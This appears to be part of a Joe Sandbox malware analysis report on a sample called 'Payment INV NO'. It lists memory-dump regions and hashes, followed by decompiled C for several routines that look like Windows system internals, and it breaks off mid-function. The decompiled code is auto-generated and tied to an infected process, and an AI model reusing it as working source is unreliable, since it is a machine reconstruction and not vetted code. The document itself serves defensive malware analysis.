                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3d53599795825cbd1438eefe57d8a9933a41a6a356a0a2fdc3a49ce8eba494d1
                                                          • Instruction ID: 90308a17812c818939ef28cef20a017033809bf49489c65855157fc63be1c0ff
                                                          • Opcode Fuzzy Hash: 3d53599795825cbd1438eefe57d8a9933a41a6a356a0a2fdc3a49ce8eba494d1
                                                          • Instruction Fuzzy Hash: 09412832600645AFDB22CBACCC84FDAFBF9EF54350F0482A6E45997352C774A944CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01795210 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E01795210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				signed char _t61;

				_t61 = E017952A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017D95D0();
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E017AEB70(_t54, 0x18879a0);
					}
					return _t52 + 2;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017D95D0();
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E017AEB70(_t54, 0x18879a0);
						}
						return _t52;
					}
					L5:
					_t33 = E017DF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E017AEB70(_t54, 0x18879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017D95D0();
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                          0x01795220
                                                          0x01795224
                                                          0x017f0d13
                                                          0x017f0d16
                                                          0x017f0d19
                                                          0x0179522a
                                                          0x0179522a
                                                          0x0179522d
                                                          0x0179522d
                                                          0x01795231
                                                          0x01795235
                                                          0x01795239
                                                          0x017f0d5c
                                                          0x017f0d62
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0d6a
                                                          0x017f0d7b
                                                          0x017f0d7f
                                                          0x017f0d81
                                                          0x017f0d84
                                                          0x017f0d95
                                                          0x017f0d95
                                                          0x017f0d6c
                                                          0x017f0d71
                                                          0x017f0d71
                                                          0x00000000
                                                          0x0179524a
                                                          0x0179524a
                                                          0x01795250
                                                          0x017f0d24
                                                          0x017f0d35
                                                          0x017f0d39
                                                          0x017f0d3b
                                                          0x017f0d3e
                                                          0x017f0d50
                                                          0x017f0d50
                                                          0x017f0d26
                                                          0x017f0d2b
                                                          0x017f0d2b
                                                          0x00000000
                                                          0x017f0d55
                                                          0x01795256
                                                          0x0179525b
                                                          0x01795265
                                                          0x017f0da7
                                                          0x0179526b
                                                          0x0179526e
                                                          0x01795272
                                                          0x017f0db1
                                                          0x017f0db4
                                                          0x017f0dc5
                                                          0x017f0dc5
                                                          0x01795272
                                                          0x01795278
                                                          0x0179527e
                                                          0x0179528a
                                                          0x0179528c
                                                          0x0179528d
                                                          0x00000000
                                                          0x01795280
                                                          0x01795282
                                                          0x01795288
                                                          0x0179529f
                                                          0x01795292
                                                          0x00000000
                                                          0x01795292
                                                          0x00000000
                                                          0x01795288
                                                          0x0179527e

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 156ad9de64b3a029bd78e7e63682cebf050415b08669bae1bc18752be6baa7c7
                                                          • Instruction ID: a1e44765d8074c77c395e30b796e3f88128e8e98da5da86f87a748455ecbd667
                                                          • Opcode Fuzzy Hash: 156ad9de64b3a029bd78e7e63682cebf050415b08669bae1bc18752be6baa7c7
                                                          • Instruction Fuzzy Hash: 70312431245611EBCB26AB28D984F6BF7B6FF50760F10466EF6164B3E6DB30E840C690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BC182 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E017BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E017B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = L01868D34(_v8, _t80);
					}
					E017B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E017AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t83 = _t80 + 0xd0;
						L01868833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E017AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E017DB180();
						if(_a4 != 0) {
							E017B2280(_t48, _t81);
						}
					} else {
						E017BBB2D(_v8 + 0xc, _t80 + 0x98);
						E017BBB2D(_v8 + 8, _t80 + 0xb0);
						E017BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E017AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							E017AFFB0(0, _t80, _t80 + 0x90);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					E017AFFB0(0, __ecx, __ecx + 0x90);
				}
				return 0;
			}














                                                          0x017bc18d
                                                          0x017bc18f
                                                          0x017bc191
                                                          0x017bc19b
                                                          0x017bc1a0
                                                          0x017bc1d4
                                                          0x017bc1de
                                                          0x01802d6e
                                                          0x017bc1e4
                                                          0x017bc1e4
                                                          0x017bc1e4
                                                          0x017bc1ec
                                                          0x01802d7d
                                                          0x01802d7d
                                                          0x017bc1f3
                                                          0x017bc1ff
                                                          0x01802d88
                                                          0x01802d8d
                                                          0x01802d94
                                                          0x01802d9f
                                                          0x01802da4
                                                          0x01802dab
                                                          0x01802db0
                                                          0x01802db2
                                                          0x01802db3
                                                          0x01802db4
                                                          0x01802dbc
                                                          0x01802dc3
                                                          0x01802dc3
                                                          0x017bc205
                                                          0x017bc211
                                                          0x017bc222
                                                          0x017bc22c
                                                          0x017bc234
                                                          0x017bc23a
                                                          0x017bc23f
                                                          0x017bc245
                                                          0x017bc24b
                                                          0x017bc251
                                                          0x017bc25a
                                                          0x017bc27d
                                                          0x017bc27d
                                                          0x017bc25c
                                                          0x017bc25c
                                                          0x00000000
                                                          0x017bc25e
                                                          0x017bc1a4
                                                          0x017bc1aa
                                                          0x017bc1b3
                                                          0x017bc26c
                                                          0x017bc26c
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d7120efdbdcf99455d06741cea03df255918ae4d8d2d7dbf9360ac1d5a7449b
                                                          • Instruction ID: c94f8517fb5e62ce6b691571f41f63299ef66082d54ec65d024fa4b3ba85280e
                                                          • Opcode Fuzzy Hash: 6d7120efdbdcf99455d06741cea03df255918ae4d8d2d7dbf9360ac1d5a7449b
                                                          • Instruction Fuzzy Hash: 7031487160558BBFD706EBB4C8C4BE9FB58BF52200F04C15AD51C97245DB346A49C7E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C53C5 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017C53C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t72;
				signed int _t77;
				intOrPtr _t79;
				void* _t80;

				_push(0x18);
				_push(0x186ff80);
				E017ED08C(__ebx, __edi, __esi);
				_t79 = __ecx;
				 *((intOrPtr*)(_t80 - 0x28)) = __ecx;
				 *((char*)(_t80 - 0x1a)) = 0;
				 *((char*)(_t80 - 0x19)) = 0;
				 *((intOrPtr*)(_t80 - 0x20)) = 0;
				 *((intOrPtr*)(_t80 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t47 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t47 = 1;
				}
				if(_t47 == 0) {
					_t77 = 0xc000000d;
					goto L18;
				} else {
					E017AEEF0( *((intOrPtr*)(_t79 + 0xc8)));
					 *((char*)(_t80 - 0x19)) = _t63;
					if( *((char*)(_t79 + 0xda)) == 2) {
						_t47 =  *(_t79 + 0xd4);
					} else {
						_t47 = 0;
					}
					if(_t47 != 0) {
						_t77 = 0;
						goto L18;
					} else {
						if( *((intOrPtr*)(_t79 + 0xd8)) != 0) {
							_t77 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t80 - 0x20)) = _t77;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t80 - 4)) = 0xfffffffe;
							E017C5520(_t47, _t64, _t79);
							return E017ED0D1(_t77);
						}
						 *((short*)(_t79 + 0xd8)) = _t63;
						 *((char*)(_t80 - 0x1a)) = _t63;
						_t72 =  *0x1885cb4; // 0x4000
						_t69 = _t79;
						_t77 = E017C55C8(_t79, (_t72 >> 3) + 2);
						 *((intOrPtr*)(_t80 - 0x20)) = _t77;
						if(_t77 < 0) {
							goto L19;
						}
						E017C5539(_t79,  *((intOrPtr*)(_t79 + 0xb4)), _t69);
						 *(_t79 + 0xd4) =  *(_t79 + 0xd4) & 0x00000000;
						 *((char*)(_t79 + 0xda)) = 0;
						E017AEB70(_t79,  *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = 0;
						_t71 = _t79;
						 *(_t80 - 0x24) = E017C3C3E(_t79);
						E017AEEF0( *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = _t63;
						_t56 =  *(_t80 - 0x24);
						if(_t56 == 0) {
							_t77 = 0xc0000017;
							 *((intOrPtr*)(_t80 - 0x20)) = 0xc0000017;
						} else {
							 *(_t79 + 0xd4) = _t56;
							 *((short*)(_t79 + 0xda)) = 0x202;
							if((E017C4190() & 0x00010000) == 0) {
								_t58 =  *0x1885cb4; // 0x4000
								 *(_t79 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t79 + 0xd8)) =  *((intOrPtr*)(_t79 + 0xd8)) + 0xffff;
						 *((char*)(_t80 - 0x1a)) = 0;
						 *((char*)(_t80 - 0x19)) = 0;
						_t47 = E017AEB70(_t71,  *((intOrPtr*)(_t79 + 0xc8)));
						goto L14;
					}
				}
			}










                                                          0x017c53c5
                                                          0x017c53c7
                                                          0x017c53cc
                                                          0x017c53d1
                                                          0x017c53d3
                                                          0x017c53d8
                                                          0x017c53db
                                                          0x017c53de
                                                          0x017c53e1
                                                          0x017c53eb
                                                          0x018070b0
                                                          0x018070b4
                                                          0x017c540e
                                                          0x017c5410
                                                          0x017c5411
                                                          0x017c5411
                                                          0x017c5415
                                                          0x018070ba
                                                          0x00000000
                                                          0x017c541b
                                                          0x017c5421
                                                          0x017c5426
                                                          0x017c5432
                                                          0x018070d3
                                                          0x017c5438
                                                          0x017c5438
                                                          0x017c5438
                                                          0x017c543c
                                                          0x018070de
                                                          0x00000000
                                                          0x017c5442
                                                          0x017c5449
                                                          0x018070c1
                                                          0x018070c6
                                                          0x018070c6
                                                          0x018070c9
                                                          0x018070c9
                                                          0x017c550c
                                                          0x017c550c
                                                          0x017c5513
                                                          0x017c551f
                                                          0x017c551f
                                                          0x017c544f
                                                          0x017c5456
                                                          0x017c5459
                                                          0x017c5465
                                                          0x017c546c
                                                          0x017c546e
                                                          0x017c5473
                                                          0x00000000
                                                          0x00000000
                                                          0x017c5482
                                                          0x017c5487
                                                          0x017c548e
                                                          0x017c549b
                                                          0x017c54a0
                                                          0x017c54a4
                                                          0x017c54ab
                                                          0x017c54b4
                                                          0x017c54b9
                                                          0x017c54bc
                                                          0x017c54c1
                                                          0x018070e2
                                                          0x018070e7
                                                          0x017c54c7
                                                          0x017c54c7
                                                          0x017c54cd
                                                          0x017c54e0
                                                          0x017c54e2
                                                          0x017c54ea
                                                          0x017c54ea
                                                          0x017c54e0
                                                          0x017c54ed
                                                          0x017c54f2
                                                          0x017c54f9
                                                          0x017c54fd
                                                          0x017c5507
                                                          0x00000000
                                                          0x017c5507
                                                          0x017c543c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47740cf77bfe6948886de5c92f9af3565b4940feddf90b633a5c276c6763763b
                                                          • Instruction ID: 7bdd678119753bf2b80e22aa3e78dfd33989772f731a6549fa9805c8ad47875a
                                                          • Opcode Fuzzy Hash: 47740cf77bfe6948886de5c92f9af3565b4940feddf90b633a5c276c6763763b
                                                          • Instruction Fuzzy Hash: C241E5307047498BDB72CBB8881479FFAE2AF55304F14062DC186A7281DB756A05CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CAC7B Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E017CAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					E017ED5E0( &(__edx[8]), _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1888a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x101f
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x28
